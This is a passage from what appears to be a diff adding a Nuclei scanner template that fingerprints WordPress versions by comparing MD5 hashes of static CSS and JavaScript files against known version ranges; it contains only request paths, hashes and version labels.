"(\"7b77a3b55888f6e3c119b109b126c2c6\" == md5(body))" + - type: dsl + name: 4.6.6 - 4.6.20 + dsl: + - "(\"dc2f9ffa2e47f163b61f994d26b607dd\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.5 + dsl: + - "(\"fb342aec4e7ffd378fcd56d24e48fa55\" == md5(body))" + - type: dsl + name: 4.5.9 - 4.5.23 + dsl: + - "(\"48e77700180d3c74e87c8e2667e0a162\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.8 + dsl: + - "(\"850a250103976d39529ed57222dbcd34\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.9 + dsl: + - "(\"4b23d9c61bb3fa987575100ca32d765f\" == md5(body))" + - type: dsl + name: 4.4.10 - 4.4.24 + dsl: + - "(\"6b321157c32a1ec554f086d26fb203ee\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.10 + dsl: + - "(\"eeb4314977b1d232ebf2e2e1cd6dd957\" == md5(body))" + - type: dsl + name: 4.3.11 - 4.3.25 + dsl: + - "(\"4f059a4db81d09861ce9bd243a698423\" == md5(body))" + - type: dsl + name: 4.2.3 - 4.2.14 + dsl: + - "(\"022571e949f8dad95e4d3fdab24a3d2c\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.2 + dsl: + - "(\"79c9c0056693f2eba1f6007ccc6fb20b\" == md5(body))" + - type: dsl + name: 4.2.15 - 4.2.29 + dsl: + - "(\"2953e98345a9b580825f4ae57b088c24\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"b1458f7c51adab170056fc1fc4c3a3ce\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"7a48c0dd8cf103ad532290fc5360e476\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"753e31324b05a56a92ee202abb3a1ba4\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.2 + dsl: + - "(\"d3c97fe598e3d7b4551f653fc78d972f\" == md5(body))" + - type: dsl + name: 4.9.3 - 4.9.7 + dsl: + - "(\"ad777cb3508a1846b816d600922c9c94\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.0.11 + dsl: + - "(\"06a4eaec20bc68b7f434a5e66af39ba6\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.2 + dsl: + - "(\"3fba5bcb39a5b8e0aaf169f839647ad5\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"a8bfc0c0b048264fff5bda068606648a\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"0865378b9026626b28d1da762422fded\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"275f7a92c4b1f21ee8e591094215f59e\" == md5(body))" + - type: dsl + name: 5.5 + dsl: + - "(\"327e78e6ea18ad8be485ea7a220af17c\" == md5(body))" + - type: dsl + name: 5.5.1 - 5.5.3 + dsl: + - "(\"fae4e9264f7c3db53c11d11b749c38f9\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"fba473f85640448e5032a63c6943591d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/block-library/style-rtl.css" + matchers: + - type: dsl + name: 5.0 - 5.0.2 + dsl: + - "(\"a81dcd1c7121e6ca6c426be55416cd81\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.1.8 + dsl: + - "(\"76adcd3fae217c56e6fc3ff97257a3b4\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"8ef50c71bf80199ba6d0a9ae9bd8ac2c\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.3 + dsl: + - "(\"69e6c58d114579fea139d1eeab95a5eb\" == md5(body))" + - type: dsl + name: 5.4 + dsl: + - "(\"5f2406cc7f7dbf1cc05cfae44634c1b7\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"ccfdbc7479353ab78da216a1cb083e60\" == md5(body))" + - type: dsl + name: 5.3.4 - 5.3.6 + dsl: + - "(\"6cf938315537e537a7b83f86d09083ff\" == md5(body))" + - type: dsl + name: 5.5 + dsl: + - "(\"19ca41d5b33c73e19f264c028750f123\" == md5(body))" + - type: dsl + name: 5.5.1 - 5.5.3 + dsl: + - "(\"c136ea8e406f08b753c50416de567eb5\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"5d4aaf71e0edba8f95c386cf5831ecef\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/block-library/style.css" + matchers: + - type: dsl + name: 5.0 - 5.0.2 + dsl: + - "(\"5373faf3d69572d540d9b0e4d5a9343c\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.1.8 + dsl: + - "(\"b57c9841759fb679653e42162a9218c7\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"74f58e58a0247899a4917cd031bbb397\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.3 + dsl: + - "(\"3fc815e03f1ef5e45b0269fb20123c31\" == md5(body))" + - type: dsl + name: 5.4 + dsl: + - "(\"3e8f8e2f37e7201633a2723931f87a29\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"ff1e4526d778743bf4370b47ff17e7c7\" == md5(body))" + - type: dsl + name: 5.3.4 - 5.3.6 + dsl: + - "(\"f8b102ddba5cb08cc9cca1f8761edc68\" == md5(body))" + - type: dsl + name: 5.5 + dsl: + - "(\"fc32e04b5acd4855f58d42fd344de79b\" == md5(body))" + - type: dsl + name: 5.5.1 - 5.5.3 + dsl: + - "(\"7cd4ab00f28c67eba2e40c822e2d78e2\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"678243a79f6d4f83e43bd1b2a6d38663\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/block-library/style-rtl.min.css" + matchers: + - type: dsl + name: 5.0 - 5.0.2 + dsl: + - "(\"ebe296f540e98fd2da0bd0a097c65906\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"d853d590816c08875d95849875e42648\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"ec43179cc672af0703e82c88bb99ac8c\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"54fde402a07e30323a0a61020c057dd6\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.3 + dsl: + - "(\"6c98f8fd086dfd625b8bfa2ac52a4293\" == md5(body))" + - type: dsl + name: 5.4 + dsl: + - "(\"2d58da14018a029b6726b1126e3cd132\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"10060fca872ba094902c7c2369badce7\" == md5(body))" + - type: dsl + name: 5.3.4 - 5.3.6 + dsl: + - "(\"49ce7010cf79420acb259b206601a1c1\" == md5(body))" + - type: dsl + name: 5.5 + dsl: + - "(\"a55b1f009c61c3cca055b596da667ca1\" == md5(body))" + - type: dsl + name: 5.5.1 - 5.5.3 + dsl: + - "(\"a2ba9a25208655c6dd71f0cecda2ded9\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"8d2ab800a215a35a3a36c951cea4a8c9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/block-library/style.min.css" + matchers: + - type: dsl + name: 5.0 - 5.0.2 + dsl: + - "(\"b9d4015ad4738655273de5ab3738e09e\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"eb1a96949e0ea0d08033d3f941bf1f3e\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"7a63f6bcae054a13315b6bf1d32dbcd4\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"375bd65d60ff3c8723fccc343afb1b9b\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.3 + dsl: + - "(\"9eeddc51b0b4a2580a959042d50f826e\" == md5(body))" + - type: dsl + name: 5.4 + dsl: + - "(\"cf20af40089bf919dc62a7abedc669e2\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"7d2051e6c59f3598b17877bf41637ec4\" == md5(body))" + - type: dsl + name: 5.3.4 - 5.3.6 + dsl: + - "(\"612b7ab9f699e968f5b3206ca16ee834\" == md5(body))" + - type: dsl + name: 5.5 + dsl: + - "(\"4c48b7dd10596a40acb74090e2230cbb\" == md5(body))" + - type: dsl + name: 5.5.1 - 5.5.3 + dsl: + - "(\"2e7e1d1c1d4d446a1b6b63295757d859\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"27f5295ccf3ad9e0e85dcac543630288\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/comment-reply.min.js" + matchers: + - type: dsl + name: 4.4 - 5.0.11 + dsl: + - "(\"56bc2726d829207bfa802f957aac0791\" == md5(body))" + - type: dsl + name: 3.8 - 4.3.25 + dsl: + - "(\"1b1e9d1d12fcc51a151e7e0688bc695f\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"82fe85cb67dbd02e20c183e43979f217\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"500ceaa723d95be311592bd902d6823e\" == md5(body))" + - type: dsl + name: 5.1 + dsl: + - "(\"59cba75479bafeebaa4d2e8a03459599\" == md5(body))" + - type: dsl + name: 5.1.1 - 5.2.9 + dsl: + - "(\"1d476ef0a02dea95add5d5e192d6c89a\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"0b6d9871863bb13b701f3b233cbf6609\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"b350b637bfb44baa409b39310cdea29a\" == md5(body))" + - type: dsl + name: 5.5 + dsl: + - "(\"d18b8b11a6c7f5b62e52651924ff52b8\" == md5(body))" + - type: dsl + name: 5.5.1 + dsl: + - "(\"69fcd9d534fec9b5d69fda83b5f9fdbb\" == md5(body))" + - type: dsl + name: 5.5.2 - 5.6 + dsl: + - "(\"6d5632a96b45b575263b8ca1751babd7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/buttons.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"deafd03cf409217af66c37196f6d819e\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"247139eb61e43078fe91e3770545528e\" == md5(body))" + - type: dsl + name: 4.6 - 4.7.3 + dsl: + - "(\"5e4b2f1d423c73e86cc870546a3843a3\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"d05ef55d8faf55ed6312a11f725ce401\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"1b5e990d2dfcf13cc8c583a92525f344\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"92489bf36e3759bf16fb38fb13a34d0e\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"c7d13152f031f1cc21fbe3975c3d50ac\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"c369daa6877b943e3cfd58f57229bd61\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"5ec6f016d5581ccf2fccfaab08682af7\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.35 + dsl: + - "(\"3f5a45249163f428749e8071146991f3\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"a1bde984a0c1ddd244220da833cabeb1\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"9ab3023423d067560b9c9049096e2bc3\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"aee0f4d3fa25115fde88df47238509ee\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"87ba05ef0da13f82c90d2e6cff2be01f\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"662264582818feac14a7084254a5ef25\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.1 + dsl: + - "(\"427b65b12d7e0b8a278d6d2d57f920b2\" == md5(body))" + - type: dsl + name: 5.2.2 + dsl: + - "(\"85611437313930a438c2ae6c02471891\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"030b661fe993d54e17ea592bcb19370f\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"a1a9694e3949832881055f9cc12c65c3\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.4.4 + dsl: + - "(\"7e528e095235c083a49611bdfa0cdf27\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"c4914187374db23dc287fc61050239ce\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/buttons-rtl.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"8224848470a669b2b0c314eb980ef194\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"4ad1a5e86b0ab2de7258fabc0a62b9ae\" == md5(body))" + - type: dsl + name: 4.4 - 4.7.3 + dsl: + - "(\"04203d21bcc20f3c309146e22db92332\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"bbb7feb905e67321f8f9fecdd391a30e\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"c0081aa47a02dc65a5081ddc3dca22db\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"1ee31e93b5f8424bc82b4e1e477e09e0\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"a3881585a04421965820bb64280358dc\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.35 + dsl: + - "(\"64e9014d99e11a00ade285978cb2c4f8\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"2f4716ac8571b8887ab6ce14764075d9\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"435b5693ad907629c93126dcf63e28e5\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"92314c04b1ab4f91ce18aced65f218f2\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"b687c9b357655bebcb4f34d53b5402ca\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.1 + dsl: + - "(\"5c33ca68783705b515c1318d9c66cdca\" == md5(body))" + - type: dsl + name: 5.2.2 + dsl: + - "(\"77f659ffd07e0276985e68447b3bb34b\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"1af281cfbde9fe8b5790ca9d4e7b9445\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"a290e445d2016584e513b23bf3537afe\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.4.4 + dsl: + - "(\"14e17b025e68cf83f453b0cf43b0d0c1\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"62b08b173b8361ef8443e18a062c2cf2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/buttons.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"789fe5df985c5f6d1944edc86e54f55b\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"74ac6750d8faed75774166c72f88fcbf\" == md5(body))" + - type: dsl + name: 4.4 - 4.7.3 + dsl: + - "(\"fa03516663b10fb9654af4e680ccc42b\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"650111cdcaee6c61ba5d238448345b2c\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"494016bf330d1bd60723efcedbf8b3ef\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"52dc838032e91584a03c7aa660c860c7\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"6b03c4aff48876c047aa6724b93e923d\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.35 + dsl: + - "(\"e82337ca2dcf3e0e43643e9912caabb3\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"47b1080fc3e5f6630771c5844dc342ec\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"da093d1bd20e5e366150d97118a39ae4\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"9047fdac8c32de54996c846d8979f186\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"24fbae22f91ed2955d47b47f5b556935\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"8b2bbab9de38118eff72be3474a6f66e\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"fafd866f7348fabb63d426137bbebda3\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.1 + dsl: + - "(\"899eaedb5b1be5a3cd2a6f0d76577c96\" == md5(body))" + - type: dsl + name: 5.2.2 + dsl: + - "(\"c9ecff278d15daf101f6a98d1795d65f\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"367df0e4a603dc2f2cd56fb8514e5d18\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"51e44535b6838661cb2efc5ec5aa1b47\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.4.4 + dsl: + - "(\"3db7da28d89e8eaa2ae459c5adf59a92\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"001ad841b7c73640d4b62e2b4ff532a2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/media-editor.min.js" + matchers: + - type: dsl + name: 4.7 - 5.2.9 + dsl: + - "(\"79cf51bae2593b7ac27b73789e43646d\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"e87a3047979eb6fca4240efe0375a64b\" == md5(body))" + - type: dsl + name: 4.4 - 4.5.23 + dsl: + - "(\"a5595167924936ae192d5f968c90abfa\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"725a37e46661f84f85a5602e6cc33d02\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"e284f524a66d2bd63a78dc948fc74416\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"4e4658d148abeeb3d2366b951a8c65b4\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"d764b49098afb4bf721bc23426d1f432\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"bf1676ffa9bb666fca90fc26f478ba69\" == md5(body))" + - type: dsl + name: 3.7 - 3.8.35 + dsl: + - "(\"bb3a5f53c1a46e2ae27667e82c582f79\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"40ca295704665e94d0fd46847c6ba51b\" == md5(body))" + - type: dsl + name: 3.5.2 + dsl: + - "(\"6399f3e251f5dd1604e7936c1634e199\" == md5(body))" + - type: dsl + name: 3.5.1 + dsl: + - "(\"960a0adb54a1ffa9bf62719e7896de57\" == md5(body))" + - type: dsl + name: 3.5 + dsl: + - "(\"74d81f993bcb756db962338aa45a7f37\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"b4fb4087063ff50d81bedfb48d6ec5db\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"5ff7354aed9fd67985ac5da235c8ee64\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"3d02ff867901ae405f5a71300621b9df\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/theme.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"b72da1b9065e2a265d6e8ee6f51607ab\" == md5(body))" + - type: dsl + name: 4.7.1 - 4.7.19 + dsl: + - "(\"ecfb55ddd7b2f7340ee501195f636afb\" == md5(body))" + - type: dsl + name: 4.7 + dsl: + - "(\"5387070f8f034c0bcfcc1355eb42e767\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"12c4f466f2fac457f7bb4ddb5eba3be9\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"4435548198f28946ced9fedefd78d486\" == md5(body))" + - type: dsl + name: 4.4.3 - 4.4.24 + dsl: + - "(\"8edc3af2d0b4adaecf9a38b660814af3\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.2 + dsl: + - "(\"3715b37b10edab644542406f0caca236\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"a4c37789b8d4b09535f742dc44ddd7f1\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"ce08e4628996a70a5d5deac9221e1130\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"73a10d6e0f9198feeff1a5ef7f377f7f\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"a5027fd2f1f9732b8a7e873b4e04c209\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"27288c303cd0348b2189a31f28a86939\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.35 + dsl: + - "(\"f5cecd61138f60a9b1048feff299ca8b\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"e3a25a3cb6290e46ba89b17a32c62f6c\" == md5(body))" + - type: dsl + name: 3.6 - 3.7.35 + dsl: + - "(\"a7f95c97f28986e4f7092dbc8678e9cf\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"ae76cc15f6fa1932e745d42c5fe26261\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"57d01c37c53a901c1a276b2e681df784\" == md5(body))" + - type: dsl + name: 3.1 - 3.3.3 + dsl: + - "(\"da9fa8f11020348651fd64858d4705bb\" == md5(body))" + - type: dsl + name: 4.9 + dsl: + - "(\"4dea99610abd3c166d4291d48039211d\" == md5(body))" + - type: dsl + name: 4.9.1 - 5.0.11 + dsl: + - "(\"7f52d864cd927714515906c74582e21b\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"76e43e1257cba406e30c224966dc2e5d\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"15c7a2d4f4cdac5a7ad33d2f66106258\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"0c2e021310bbd9bf031b4d3b42fe0377\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"e202e910a7087e7899160f89851b99fa\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/widgets.css" + matchers: + - type: dsl + name: 4.8.1 - 4.8.15 + dsl: + - "(\"ef7ad4431fae07bceca3076e9762d135\" == md5(body))" + - type: dsl + name: 4.8 + dsl: + - "(\"d5aa95eb9b8a99353bb0bcd23e585035\" == md5(body))" + - type: dsl + name: 4.6 - 4.7.19 + dsl: + - "(\"53bfa004b8ec5ed07348b9ff3e79af55\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"85f24f95f8da242c164ca6de0610e184\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"e9bf39da5e8f7e35eb748389d838d709\" == md5(body))" + - type: dsl + name: 4.2.3 - 4.3.25 + dsl: + - "(\"4aa8d8e3d5d42930d6c7788880431a86\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.2 + dsl: + - "(\"4dc79b8deabc48edc3cb04b90633810d\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"ca4d97e656a62052423e53195ff42412\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"56f13b1bab3f517460dab5554e057056\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"8a9b28d7e969543624a0c3c22b1950f9\" == md5(body))" + - type: dsl + name: 3.0 - 3.1.4 + dsl: + - "(\"cdada849d89389820c2cb3e18c0a8765\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"da01dd4c0f6a2ef5d110cb4aa3cf394a\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"c4d1ad88ee2a59c096cee1ac30690056\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"0d6834ae4edcd6445a8426f7f6ec6c4e\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"6fb81427ceb258198deac5113ddcb498\" == md5(body))" + - type: dsl + name: 2.5.1 + dsl: + - "(\"d45da61a2c6ceb19f07c71aa48dae40a\" == md5(body))" + - type: dsl + name: 2.5 + dsl: + - "(\"74412c2868056ef2971bee2c271962a8\" == md5(body))" + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"18eac3dce97d2b547263edbbb6d6eb37\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.2 + dsl: + - "(\"cf21d93a0c7ef4b4fe265efefa82193f\" == md5(body))" + - type: dsl + name: 4.9.3 - 4.9.16 + dsl: + - "(\"f3631c4a603a3cf7a8fb36e9d08d6435\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"bf91cac38229762201f530491ba2b604\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"16a2e4ba32a72d469fce4650878b2743\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"652fb07102f908931f36672e1477d233\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"2b91a746ea29f9a8ba3c2c0ce4c92259\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"8c91a8cfdae3032e7f39e0ba6e93b350\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"44852a3d288d9b8093aab51e4d397871\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/buttons-rtl.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"cf359b843c6624dffc39bc093f616237\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"e0e4ffc59213fcab73cd96ac94d0f002\" == md5(body))" + - type: dsl + name: 4.6 - 4.7.3 + dsl: + - "(\"18cac60d5d31e37c3070817504c62af3\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"fd0faafb40ed3a5b818deb13eaf45ead\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"6370534afc150761f63d4b5447ce628c\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"440f128e2267419185ce47d2f8d0505c\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"313eace8c7cc0ef43a877a5e15c8f3bd\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"adf3b5ecfe050b4e66e2a0d08e944444\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"d24d1d1eb3a4b9a4998e4df1761f8b9e\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.35 + dsl: + - "(\"fb062ed92b76638c161e80f4a5426586\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"71c13ab1693b45fb3d7712e540c4dfe0\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"4ec02ca83e210f35bbaf97fb4ed2a037\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"2f8b834d9d91275dbd682e1ea4dd38cd\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"850bd00d787bedbd6d8ea66ab464ec3e\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.1 + dsl: + - "(\"08dd5ea858d4a994978b75b00a4ded65\" == md5(body))" + - type: dsl + name: 5.2.2 + dsl: + - "(\"aba6fa8415824ee5f226b4631627dd1c\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"4238af66b73068824be148b4ce0473b9\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"87941cb9071bb1357623efed51881f18\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"543f7d2253e40f47dcfbf1a1468fc3e8\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"f9187bd63a056aad59c34bcfd6dfecd5\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"9224fae643e4a459dc42bd5417e966cc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/media-editor.js" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"4c69a1599bd6868a31cd43b7f899964d\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"5ec5214a027bf7e38370b75fe6d4b51a\" == md5(body))" + - type: dsl + name: 4.4 - 4.5.23 + dsl: + - "(\"2ea5ca0b74bb2b7e36d2a3384ca51c4e\" == md5(body))" + - type: dsl + name: 4.2 - 4.3.25 + dsl: + - "(\"20f9f27717e6b1fd22576cdffba06336\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"000059450d81178e0ea9fea810f81859\" == md5(body))" + - type: dsl 